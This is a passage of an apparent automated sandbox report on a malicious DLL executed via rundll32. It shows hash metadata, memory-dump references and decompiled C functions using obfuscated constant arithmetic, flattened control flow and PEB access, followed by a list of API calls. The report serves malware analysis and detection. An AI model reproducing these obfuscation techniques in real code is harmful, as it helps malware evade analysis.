                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                      • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10031FC2 Relevance: .4, Instructions: 378COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                      • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10031BB6 Relevance: .4, Instructions: 361COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                      • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100317E2 Relevance: .4, Instructions: 351COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                      • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034FD8C Relevance: .2, Instructions: 164COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E0034FD8C() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				short _t136;
				short _t138;
				signed int _t141;
				signed int _t144;
				void* _t145;
				void* _t146;
				intOrPtr _t164;
				void* _t165;
				short* _t166;
				short* _t167;
				void* _t168;
				short* _t169;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				void* _t174;

				_t164 =  *0x36520c; // 0x0
				_v8 = 0xafc848;
				_t165 = _t164 + 0x220;
				_t146 = 0xaad6b4c;
				_t170 = 0xc;
				_v8 = _v8 / _t170;
				_v8 = _v8 ^ 0xeddef8c6;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x0edbb261;
				_v16 = 0xa05fce;
				_v16 = _v16 + 0x102e;
				_v16 = _v16 + 0x8702;
				_v16 = _v16 ^ 0x00a5637b;
				_v48 = 0xdd0656;
				_v48 = _v48 >> 2;
				_v48 = _v48 ^ 0x00330133;
				_v24 = 0x8dacbc;
				_t144 = 0x5c;
				_t171 = 0x3d;
				_v24 = _v24 * 0x19;
				_v24 = _v24 / _t144;
				_v24 = _v24 ^ 0x00283487;
				_v20 = 0x519264;
				_t145 = 2;
				_v20 = _v20 * 0x67;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x41a5f983;
				_v32 = 0xc0edbc;
				_v32 = _v32 * 0x1e;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0xdc023425;
				_v28 = 0xb6ecb7;
				_v28 = _v28 * 0x1e;
				_v28 = _v28 + 0x349f;
				_v28 = _v28 ^ 0x156255f9;
				_v36 = 0x8be990;
				_v36 = _v36 | 0x6444358b;
				_v36 = _v36 * 0x59;
				_v36 = _v36 ^ 0x0c402a41;
				_v52 = 0xcdd122;
				_v52 = _v52 ^ 0xde2c2ef8;
				_v52 = _v52 ^ 0xdee78ce8;
				_v40 = 0xa1b7cb;
				_v40 = _v40 ^ 0x66c9ba9b;
				_v40 = _v40 + 0xffffb195;
				_v40 = _v40 ^ 0x666fdaad;
				_v56 = 0x9437d4;
				_v56 = _v56 / _t171;
				_v56 = _v56 ^ 0x00087e9b;
				_v12 = 0x6793e4;
				_v12 = _v12 << 2;
				_v12 = _v12 >> 8;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x000c2cdf;
				_v44 = 0x8cb917;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 << 6;
				_v44 = _v44 ^ 0x00016464;
				do {
					while(_t146 != 0xa09253) {
						if(_t146 == 0x53e5fac) {
							_t172 = E0034EF71(4, 0x10);
							_push(_t172);
							_push(_v56);
							_push(_t165);
							E00345A07(1, _v40);
							_t174 = _t174 + 0x14;
							_t167 = _t165 + _t172 * 2;
							_t146 = 0xa09253;
							_t136 = 0x2e;
							 *_t167 = _t136;
							_t165 = _t167 + _t145;
							continue;
						} else {
							if(_t146 == 0xaad6b4c) {
								_t138 = E00345AE2(_t146);
								_t146 = 0xd305119;
								continue;
							} else {
								if(_t146 == 0xd305119) {
									_t141 = E0034EF71(4, 0x10);
									_push(1);
									_push(_v20);
									_push(_t165);
									_t173 = _t141;
									E00345A07(_t145, _v24);
									_push(_t173);
									_push(_v28);
									_t168 = _t165 + _t145;
									_push(_t168);
									E00345A07(1, _v32);
									_t174 = _t174 + 0x20;
									_t169 = _t168 + _t173 * 2;
									_t146 = 0x53e5fac;
									_t138 = 0x5c;
									 *_t169 = _t138;
									_t165 = _t169 + _t145;
									continue;
								}
							}
						}
						goto L9;
					}
					_push(3);
					_push(_v44);
					_push(_t165);
					E00345A07(1, _v12);
					_t166 = _t165 + 6;
					_t174 = _t174 + 0xc;
					_t146 = 0xc2dacde;
					 *_t166 = 0;
					_t165 = _t166 + _t145;
					L9:
				} while (_t146 != 0xc2dacde);
				return _t138;
			}

































                                                                                                                      0x0034fd95
                                                                                                                      0x0034fd9d
                                                                                                                      0x0034fda4
                                                                                                                      0x0034fdad
                                                                                                                      0x0034fdb4
                                                                                                                      0x0034fdb9
                                                                                                                      0x0034fdbe
                                                                                                                      0x0034fdc5
                                                                                                                      0x0034fdc9
                                                                                                                      0x0034fdd0
                                                                                                                      0x0034fdd7
                                                                                                                      0x0034fdde
                                                                                                                      0x0034fde5
                                                                                                                      0x0034fdec
                                                                                                                      0x0034fdf3
                                                                                                                      0x0034fdf7
                                                                                                                      0x0034fdfe
                                                                                                                      0x0034fe09
                                                                                                                      0x0034fe0c
                                                                                                                      0x0034fe0f
                                                                                                                      0x0034fe19
                                                                                                                      0x0034fe1c
                                                                                                                      0x0034fe23
                                                                                                                      0x0034fe2e
                                                                                                                      0x0034fe2f
                                                                                                                      0x0034fe32
                                                                                                                      0x0034fe35
                                                                                                                      0x0034fe3c
                                                                                                                      0x0034fe47
                                                                                                                      0x0034fe4a
                                                                                                                      0x0034fe4e
                                                                                                                      0x0034fe55
                                                                                                                      0x0034fe60
                                                                                                                      0x0034fe63
                                                                                                                      0x0034fe6a
                                                                                                                      0x0034fe71
                                                                                                                      0x0034fe78
                                                                                                                      0x0034fe83
                                                                                                                      0x0034fe86
                                                                                                                      0x0034fe8d
                                                                                                                      0x0034fe94
                                                                                                                      0x0034fe9b
                                                                                                                      0x0034fea2
                                                                                                                      0x0034fea9
                                                                                                                      0x0034feb0
                                                                                                                      0x0034feb7
                                                                                                                      0x0034febe
                                                                                                                      0x0034feca
                                                                                                                      0x0034fecd
                                                                                                                      0x0034fed4
                                                                                                                      0x0034fedb
                                                                                                                      0x0034fedf
                                                                                                                      0x0034fee3
                                                                                                                      0x0034fee7
                                                                                                                      0x0034feee
                                                                                                                      0x0034fef5
                                                                                                                      0x0034fef9
                                                                                                                      0x0034fefd
                                                                                                                      0x0034ff04
                                                                                                                      0x0034ff04
                                                                                                                      0x0034ff16
                                                                                                                      0x0034ff92
                                                                                                                      0x0034ff96
                                                                                                                      0x0034ff97
                                                                                                                      0x0034ff9e
                                                                                                                      0x0034ff9f
                                                                                                                      0x0034ffa4
                                                                                                                      0x0034ffa7
                                                                                                                      0x0034ffaa
                                                                                                                      0x0034ffb1
                                                                                                                      0x0034ffb2
                                                                                                                      0x0034ffb5
                                                                                                                      0x00000000
                                                                                                                      0x0034ff18
                                                                                                                      0x0034ff1e
                                                                                                                      0x0034ff77
                                                                                                                      0x0034ff7c
                                                                                                                      0x00000000
                                                                                                                      0x0034ff20
                                                                                                                      0x0034ff26
                                                                                                                      0x0034ff36
                                                                                                                      0x0034ff3b
                                                                                                                      0x0034ff3d
                                                                                                                      0x0034ff45
                                                                                                                      0x0034ff46
                                                                                                                      0x0034ff48
                                                                                                                      0x0034ff4d
                                                                                                                      0x0034ff4e
                                                                                                                      0x0034ff56
                                                                                                                      0x0034ff59
                                                                                                                      0x0034ff5a
                                                                                                                      0x0034ff5f
                                                                                                                      0x0034ff62
                                                                                                                      0x0034ff65
                                                                                                                      0x0034ff6c
                                                                                                                      0x0034ff6d
                                                                                                                      0x0034ff70
                                                                                                                      0x00000000
                                                                                                                      0x0034ff70
                                                                                                                      0x0034ff26
                                                                                                                      0x0034ff1e
                                                                                                                      0x00000000
                                                                                                                      0x0034ff16
                                                                                                                      0x0034ffbc
                                                                                                                      0x0034ffbe
                                                                                                                      0x0034ffc6
                                                                                                                      0x0034ffc8
                                                                                                                      0x0034ffcd
                                                                                                                      0x0034ffd2
                                                                                                                      0x0034ffd5
                                                                                                                      0x0034ffda
                                                                                                                      0x0034ffdd
                                                                                                                      0x0034ffdf
                                                                                                                      0x0034ffdf
                                                                                                                      0x0034fff1

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 58d5ece5394ff60d8422bdb6f3c2f70c600b81f2e45301c612aeb3684467fd80
                                                                                                                      • Instruction ID: c038a6f9a0ff0671fe2e243c75dccf07d11e215e702fd14916bb9fb1b0fef389
                                                                                                                      • Opcode Fuzzy Hash: 58d5ece5394ff60d8422bdb6f3c2f70c600b81f2e45301c612aeb3684467fd80
                                                                                                                      • Instruction Fuzzy Hash: 7B615775D01209ABDB09DFA4C88A9EEFBB1FF44714F204119E212BB291D3B52A45CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035E498 Relevance: .1, Instructions: 113COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 82%
                                                                                                                      			E0035E498(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _v68;
				intOrPtr _v72;
				char _v592;
				void* _t122;
				signed int _t137;
				signed int _t138;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t122);
				_v72 = 0xec580c;
				asm("stosd");
				_t137 = 0x76;
				asm("stosd");
				asm("stosd");
				_v48 = 0xa71dc1;
				_v48 = _v48 << 0x10;
				_v48 = _v48 ^ 0x1dc99f4e;
				_v8 = 0x906d24;
				_v8 = _v8 | 0x748f1c77;
				_v8 = _v8 + 0xffff13d2;
				_v8 = _v8 * 0x4a;
				_v8 = _v8 ^ 0xb5d1b34d;
				_v32 = 0x99e404;
				_v32 = _v32 ^ 0xe9d0d5f4;
				_v32 = _v32 + 0x5a31;
				_v32 = _v32 ^ 0xe94bd9b5;
				_v16 = 0xd98a19;
				_v16 = _v16 + 0xffff99bf;
				_v16 = _v16 + 0x1a5b;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x64f05351;
				_v40 = 0x441d8c;
				_v40 = _v40 + 0xbe9c;
				_t138 = 0x7a;
				_v40 = _v40 / _t137;
				_v40 = _v40 ^ 0x00086b18;
				_v20 = 0xfc7ad5;
				_v20 = _v20 + 0x78e5;
				_v20 = _v20 + 0xffff6dfc;
				_v20 = _v20 + 0xa8d2;
				_v20 = _v20 ^ 0x00f25a11;
				_v44 = 0xb09661;
				_v44 = _v44 << 2;
				_v44 = _v44 + 0x5c70;
				_v44 = _v44 ^ 0x02c80175;
				_v12 = 0xc44555;
				_v12 = _v12 | 0x8aaf582b;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x8e0d3178;
				_v12 = _v12 ^ 0x9f5e57b0;
				_v36 = 0x15e160;
				_v36 = _v36 << 7;
				_v36 = _v36 * 0x45;
				_v36 = _v36 ^ 0xf2df9ca5;
				_v24 = 0xe11875;
				_v24 = _v24 + 0xffffa15f;
				_v24 = _v24 / _t138;
				_v24 = _v24 ^ 0x000fcfe6;
				_v56 = 0xedc19c;
				_v56 = _v56 | 0x5ad96a0a;
				_v56 = _v56 ^ 0x5af69f46;
				_v52 = 0x112c39;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x00831cf8;
				_v28 = 0xaa6b89;
				_v28 = _v28 >> 4;
				_v28 = _v28 + 0xffff7c23;
				_v28 = _v28 ^ 0x00029c7f;
				_push(_v16);
				_push(_v32);
				_push(0x3412a4);
				E00343BF8(_v20, _v28, E0034AB66(_v48, _v8, _v28), _v44, _v12,  &_v592, _a8);
				E0034AE03(_v36, _v24, _v56, _t131);
				return E0034BAB0( &_v592, _v52, _v28);
			}






















                                                                                                                      0x0035e4a3
                                                                                                                      0x0035e4a6
                                                                                                                      0x0035e4a9
                                                                                                                      0x0035e4aa
                                                                                                                      0x0035e4ab
                                                                                                                      0x0035e4b0
                                                                                                                      0x0035e4be
                                                                                                                      0x0035e4c1
                                                                                                                      0x0035e4c4
                                                                                                                      0x0035e4c5
                                                                                                                      0x0035e4c6
                                                                                                                      0x0035e4cd
                                                                                                                      0x0035e4d1
                                                                                                                      0x0035e4d8
                                                                                                                      0x0035e4df
                                                                                                                      0x0035e4e6
                                                                                                                      0x0035e4f1
                                                                                                                      0x0035e4f4
                                                                                                                      0x0035e4fb
                                                                                                                      0x0035e502
                                                                                                                      0x0035e509
                                                                                                                      0x0035e510
                                                                                                                      0x0035e517
                                                                                                                      0x0035e51e
                                                                                                                      0x0035e525
                                                                                                                      0x0035e52c
                                                                                                                      0x0035e530
                                                                                                                      0x0035e537
                                                                                                                      0x0035e53e
                                                                                                                      0x0035e54a
                                                                                                                      0x0035e54b
                                                                                                                      0x0035e550
                                                                                                                      0x0035e557
                                                                                                                      0x0035e55e
                                                                                                                      0x0035e565
                                                                                                                      0x0035e56c
                                                                                                                      0x0035e573
                                                                                                                      0x0035e57a
                                                                                                                      0x0035e581
                                                                                                                      0x0035e585
                                                                                                                      0x0035e58c
                                                                                                                      0x0035e593
                                                                                                                      0x0035e59a
                                                                                                                      0x0035e5a1
                                                                                                                      0x0035e5a5
                                                                                                                      0x0035e5ac
                                                                                                                      0x0035e5b3
                                                                                                                      0x0035e5ba
                                                                                                                      0x0035e5c2
                                                                                                                      0x0035e5c5
                                                                                                                      0x0035e5cc
                                                                                                                      0x0035e5d3
                                                                                                                      0x0035e5df
                                                                                                                      0x0035e5e2
                                                                                                                      0x0035e5e9
                                                                                                                      0x0035e5f0
                                                                                                                      0x0035e5f7
                                                                                                                      0x0035e5fe
                                                                                                                      0x0035e605
                                                                                                                      0x0035e609
                                                                                                                      0x0035e610
                                                                                                                      0x0035e617
                                                                                                                      0x0035e61b
                                                                                                                      0x0035e622
                                                                                                                      0x0035e629
                                                                                                                      0x0035e62c
                                                                                                                      0x0035e62f
                                                                                                                      0x0035e65b
                                                                                                                      0x0035e66a
                                                                                                                      0x0035e688

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 008e4cd0db60346fa01f2895a3ffab4822719c71de510f6cae6d45b5308bac95
                                                                                                                      • Instruction ID: 039afd719c1e32c3fcd167ca617b762aaa5b9434476eecaa81a8e86cf345e19f
                                                                                                                      • Opcode Fuzzy Hash: 008e4cd0db60346fa01f2895a3ffab4822719c71de510f6cae6d45b5308bac95
                                                                                                                      • Instruction Fuzzy Hash: 835123B2D0131DEBCF44DFA5C94A4DEBBB2FB04314F208198E511BA260D7B91A09CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 003468DE Relevance: .1, Instructions: 73COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E003468DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				void* _t87;
				signed int _t99;
				signed int _t100;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0034CF25(_t87);
				_v8 = 0x73b8de;
				_v8 = _v8 ^ 0x19054fb7;
				_v8 = _v8 << 0xd;
				_v8 = _v8 + 0x3490;
				_v8 = _v8 ^ 0xdee55d26;
				_v20 = 0xe646cf;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0000515e;
				_v16 = 0xc8864d;
				_v16 = _v16 >> 7;
				_v16 = _v16 + 0xffff7ea5;
				_v16 = _v16 >> 1;
				_v16 = _v16 ^ 0x000d0f10;
				_v16 = 0xf76b6b;
				_v16 = _v16 + 0xffff8d96;
				_v16 = _v16 + 0xa530;
				_v16 = _v16 ^ 0x00f3b26e;
				_v28 = 0xad3635;
				_v28 = _v28 << 4;
				_v28 = _v28 ^ 0x0ad12e90;
				_v28 = 0xa7b230;
				_t99 = 0x21;
				_v28 = _v28 * 0x16;
				_v28 = _v28 ^ 0x0e6a6f58;
				_v28 = 0xa141da;
				_v28 = _v28 / _t99;
				_v28 = _v28 ^ 0x0004c009;
				_v16 = 0x3b52c9;
				_t100 = 0x69;
				_v16 = _v16 / _t100;
				_v16 = _v16 | 0xd3b68a53;
				_v16 = _v16 + 0xffff1b94;
				_v16 = _v16 ^ 0xd3beae71;
				_v12 = 0xce562d;
				_v12 = _v12 << 0x10;
				_v12 = _v12 << 0x10;
				_v12 = _v12 + 0xffff0c4b;
				_v12 = _v12 ^ 0xfffd1cdf;
				_v24 = 0x109fa9;
				_v24 = _v24 >> 8;
				_v24 = _v24 ^ 0x0002830d;
				return E003540F4(_v28, _v16, _a12, _v12, _v24, E00355BB3());
			}












                                                                                                                      0x003468e4
                                                                                                                      0x003468e7
                                                                                                                      0x003468ea
                                                                                                                      0x003468ed
                                                                                                                      0x003468ef
                                                                                                                      0x003468f4
                                                                                                                      0x003468fd
                                                                                                                      0x00346904
                                                                                                                      0x00346908
                                                                                                                      0x0034690f
                                                                                                                      0x00346916
                                                                                                                      0x0034691d
                                                                                                                      0x00346921
                                                                                                                      0x00346928
                                                                                                                      0x0034692f
                                                                                                                      0x00346933
                                                                                                                      0x0034693a
                                                                                                                      0x0034693d
                                                                                                                      0x00346944
                                                                                                                      0x0034694b
                                                                                                                      0x00346952
                                                                                                                      0x00346959
                                                                                                                      0x00346960
                                                                                                                      0x00346967
                                                                                                                      0x0034696b
                                                                                                                      0x00346972
                                                                                                                      0x0034697f
                                                                                                                      0x00346982
                                                                                                                      0x00346985
                                                                                                                      0x0034698c
                                                                                                                      0x0034699a
                                                                                                                      0x0034699d
                                                                                                                      0x003469a4
                                                                                                                      0x003469ae
                                                                                                                      0x003469b1
                                                                                                                      0x003469b4
                                                                                                                      0x003469bb
                                                                                                                      0x003469c2
                                                                                                                      0x003469c9
                                                                                                                      0x003469d0
                                                                                                                      0x003469d4
                                                                                                                      0x003469d8
                                                                                                                      0x003469df
                                                                                                                      0x003469e6
                                                                                                                      0x003469ed
                                                                                                                      0x003469f1
                                                                                                                      0x00346a1e

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d2a8de53734b9d3901bc94b6b25c32e81bc309cda1bfd67e32ed41b72a8c3f3f
                                                                                                                      • Instruction ID: 581617dc6a524ab47ee1232f08aca7877fdbfd719bb69cda969d514d618ce5c5
                                                                                                                      • Opcode Fuzzy Hash: d2a8de53734b9d3901bc94b6b25c32e81bc309cda1bfd67e32ed41b72a8c3f3f
                                                                                                                      • Instruction Fuzzy Hash: 5E31B1B6C0170DEBDF49DFE5D84A4EEBBB1BB10308F208599E611A6261D3B55B54CF80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035D374 Relevance: .0, Instructions: 2COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0035D374() {

				return  *[fs:0x30];
			}



                                                                                                                      0x0035d37a

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014DA8 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                      • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                      • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                      • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                      • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                      • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014F68
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                      • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
